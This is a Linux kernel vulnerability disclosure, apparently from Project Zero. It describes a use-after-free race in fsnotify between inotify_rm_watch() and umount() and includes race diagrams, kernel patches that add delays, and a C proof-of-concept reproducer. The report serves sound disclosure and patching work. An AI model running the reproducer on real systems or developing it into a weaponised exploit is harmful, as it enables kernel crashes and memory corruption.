Summary

There's a UAF race between inotify_rm_watch() and umount(); my guess is that it is hard to hit (at least when panic_on_oops is enabled) because a more likely race ordering will cause a kernel oops. Hitting it requires root privileges over a mount namespace.

I'll send a suggested patch in a bit.

I am reporting this as a security bug, but I suspect it is hard to exploit because of the easier-to-hit race ordering that oopses with a poison pointer dereference.

Let me know if you would like me to repost the patch on the list for public review.

Issue description

commit d2f277e26f52 ("fsnotify: rename fsnotify_{get,put}_sb_connectors()") contains the following changes:

+static void fsnotify_put_inode_ref(struct inode *inode)
+{
+	fsnotify_put_sb_watched_objects(inode->i_sb);
+	iput(inode);
+}
[...]
-static void fsnotify_put_inode_ref(struct inode *inode)
-{
-	struct super_block *sb = inode->i_sb;
-
-	iput(inode);
-	if (atomic_long_dec_and_test(&sb->s_fsnotify_connectors))
-		wake_up_var(&sb->s_fsnotify_connectors);
-}

This changes the ordering such that use-after-free can happen when inotify_rm_watch() races with umount().

As background, holding a reference on an inode with iget()/iput() is normally not allowed unless the corresponding superblock is kept alive separately (for example, by holding a reference on a mount of the superblock). Breaking that rule can lead to UAF.

fsnotify marks can hold references to inodes because generic_shutdown_super() calls fsnotify_sb_delete(), which is supposed to ensure that fsnotify holds no more inode references before returning.

In fsnotify_sb_delete(), the fsnotify_unmount_inodes(sb) call removes most fsnotify marks on inodes in the filesystem, but it can skip some elements which are concurrently being removed through other codepaths if the marks are already disconnected from the connector.
The wait_var_event(&sb->s_fsnotify_connectors, !atomic_long_read(&sb->s_fsnotify_connectors)) is responsible for reliably waiting for such fsnotify marks to be removed.

So in fsnotify_put_inode_ref(), the ordering matters: iput() must happen before the sb->s_fsnotify_connectors count is decremented. After commit d2f277e26f52 (where the decrement happens through fsnotify_put_sb_watched_objects()), the ordering is wrong, and it is possible to crash or hit use-after-free when umount() runs while fsnotify_put_inode_ref() is between fsnotify_put_sb_watched_objects() and iput().

See this possible race ordering (assuming the filesystem is a tmpfs):

TASK 1                                      TASK 2
======                                      ======
inotify_rm_watch syscall
  fsnotify_put_mark
    fsnotify_drop_object
      fsnotify_put_inode_ref
        fsnotify_put_sb_watched_objects
          [decrement watched_objects]
                                            task_work_run
                                              __cleanup_mnt
                                                cleanup_mnt
                                                  deactivate_super
                                                    deactivate_locked_super
                                                      kill_litter_super
                                                        kill_anon_super
                                                          generic_shutdown_super
                                                            fsnotify_sb_delete
                                                              [wait for watched_objects==0]
                                                            shmem_put_super
                                                            CHECK_DATA_CORRUPTION [no inodes]
        iput

In this case, thanks to hardening added in commit 47d586913f2a ("fs: Use CHECK_DATA_CORRUPTION() when kernel bugs are detected"), either we will BUG() at the CHECK_DATA_CORRUPTION() (in CONFIG_BUG_ON_DATA_CORRUPTION=y builds), or we will crash with a VFS_PTR_POISON dereference (because of the poison values written in generic_shutdown_super after the CHECK_DATA_CORRUPTION()).
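The ordering requirement described above can be illustrated with a small single-threaded userspace model. This is only a sketch, not kernel code: `model_sb`, `put_order` and `put_inode_ref_has_unsafe_window()` are hypothetical names made up for illustration, and the model only checks whether there is a point between the two steps at which the unmounting task's wait condition (counter is zero) is already satisfied while an inode reference is still held.

```c
#include <stdbool.h>

/* Hypothetical model of the per-superblock state that matters here. */
struct model_sb {
	long watched_objects;	/* stands in for the fsnotify per-sb counter */
	int inode_refs;		/* inode references still held by fsnotify */
};

/* The two possible orderings of the put path. */
enum put_order { DECREMENT_THEN_IPUT, IPUT_THEN_DECREMENT };

/*
 * Run the two steps of the put path in the given order and report
 * whether, between them, an unmounting task that waits only for
 * watched_objects == 0 could proceed while an inode reference remains.
 */
bool put_inode_ref_has_unsafe_window(struct model_sb *sb, enum put_order order)
{
	bool unsafe;

	if (order == DECREMENT_THEN_IPUT)
		sb->watched_objects--;	/* counter dropped first */
	else
		sb->inode_refs--;	/* inode reference dropped first */

	/* Wait condition already true, but an inode reference is still held. */
	unsafe = (sb->watched_objects == 0 && sb->inode_refs > 0);

	if (order == DECREMENT_THEN_IPUT)
		sb->inode_refs--;
	else
		sb->watched_objects--;

	return unsafe;
}
```

Starting from one watched object and one inode reference, the model reports an unsafe window for DECREMENT_THEN_IPUT (the ordering after commit d2f277e26f52) and none for IPUT_THEN_DECREMENT (the ordering before it).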
But we can also get use-after-free with a harder-to-hit ordering:

TASK 1                                      TASK 2
======                                      ======
inotify_rm_watch syscall
  fsnotify_put_mark
    fsnotify_drop_object
      fsnotify_put_inode_ref
        fsnotify_put_sb_watched_objects
          [decrement watched_objects]
                                            task_work_run
                                              __cleanup_mnt
                                                cleanup_mnt
                                                  deactivate_super
                                                    deactivate_locked_super
                                                      kill_litter_super
                                                        kill_anon_super
                                                          generic_shutdown_super
                                                            fsnotify_sb_delete
                                                              [wait for watched_objects==0]
                                                            shmem_put_super
                                                              kfree(sb->s_fs_info)
        iput
          iput_final
            evict
              shmem_evict_inode
                [UAF access to sb->s_fs_info]
                                                              sb->s_fs_info = NULL
                                                            CHECK_DATA_CORRUPTION [no inodes]

Reproducer

To reproduce the UAF, you'll have to patch some delays into the kernel:

diff --git a/fs/notify/mark.c b/fs/notify/mark.c
index c45b222cf9c1..758efc931a0c 100644
--- a/fs/notify/mark.c
+++ b/fs/notify/mark.c
@@ -70,6 +70,7 @@
 #include
 #include
 #include
+#include <linux/delay.h>
 
 #include
 
@@ -151,6 +152,11 @@ static void fsnotify_get_inode_ref(struct inode *inode)
 static void fsnotify_put_inode_ref(struct inode *inode)
 {
 	fsnotify_put_sb_watched_objects(inode->i_sb);
+	if (strcmp(current->comm, "SLOWME") == 0) {
+		pr_warn("%s: begin delay\n", __func__);
+		mdelay(2000);
+		pr_warn("%s: end delay\n", __func__);
+	}
 	iput(inode);
 }
 
diff --git a/fs/super.c b/fs/super.c
index c9c7223bc2a2..a2789b0a1f6a 100644
--- a/fs/super.c
+++ b/fs/super.c
@@ -630,7 +630,9 @@ void generic_shutdown_super(struct super_block *sb)
 		 * Clean up and evict any inodes that still have references due
 		 * to fsnotify or the security policy.
 		 */
+		pr_warn("%s: calling fsnotify_sb_delete()\n", __func__);
 		fsnotify_sb_delete(sb);
+		pr_warn("%s: after fsnotify_sb_delete()\n", __func__);
 		security_sb_delete(sb);
 
 		if (sb->s_dio_done_wq) {
diff --git a/mm/shmem.c b/mm/shmem.c
index e87f5d6799a7..0c05a68753b6 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -40,6 +40,7 @@
 #include
 #include
 #include
+#include <linux/delay.h>
 #include "swap.h"
 
 static struct vfsmount *shm_mnt __ro_after_init;
@@ -4619,6 +4620,7 @@ static void shmem_put_super(struct super_block *sb)
 	percpu_counter_destroy(&sbinfo->used_blocks);
 	mpol_put(sbinfo->mpol);
 	kfree(sbinfo);
+	mdelay(2000);
 	sb->s_fs_info = NULL;
 }
 

With that, the following reproducer should trigger UAF:

#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/inotify.h>
#include <sys/mount.h>
#include <sys/prctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

// runs umount() one second in, while the main thread sits in the patched-in delay
static void *thread_fn(void *dummy) {
  sleep(1);
  SYSCHK(umount("/tmp"));
  return NULL;
}

int main(void) {
  // boilerplate start code
  sync();
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  // set up user namespace (for unprivileged access to mount())
  int outer_uid = getuid();
  int outer_gid = getgid();
  SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));
  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));
  write_file("/proc/self/setgroups", "deny");
  write_map("/proc/self/uid_map", outer_uid);
  write_map("/proc/self/gid_map", outer_gid);

  SYSCHK(mount("blah", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, ""));
  SYSCHK(close(SYSCHK(open("/tmp/aaa", O_RDWR|O_CREAT, 0700))));
  int fd = SYSCHK(inotify_init());
  int wd = SYSCHK(inotify_add_watch(fd, "/tmp/aaa", IN_MODIFY));

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  // the task name "SLOWME" enables the delay patched into fsnotify_put_inode_ref()
  SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
  SYSCHK(inotify_rm_watch(fd, wd));
  pthread_join(thread, NULL);
}

Disclosure deadline

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-02-17.

For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

Related CVE Number: CVE-2024-53143.

Credit: Jann Horn